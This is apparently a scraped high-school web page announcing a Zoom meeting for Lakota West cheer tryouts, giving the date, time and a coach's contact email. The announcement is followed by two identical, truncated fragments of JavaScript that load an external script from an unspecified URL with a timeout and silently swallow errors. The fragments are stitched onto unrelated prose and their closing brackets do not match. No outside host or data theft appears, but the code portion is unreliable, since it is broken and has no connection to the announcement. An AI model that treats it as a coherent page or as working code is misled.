Fall Cheer
Mark Your Calendars: Lakota West Cheer Tryout Zoom Meeting on March 23rd!
There will be a Lakota West Cheer zoom meeting for students currently in grades 8 through 11 who will attend Lakota West next fall and are interested in trying out. The meeting will be on Wednesday, March 23rd starting at 7:00 PM. Athletes interested in cheering should participate in this meeting and have a parent listen to get information about the upcoming season. Don’t hesitate to contact Coach Rogers at kayla.rodgers24@yahoo.com for any additional information.
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();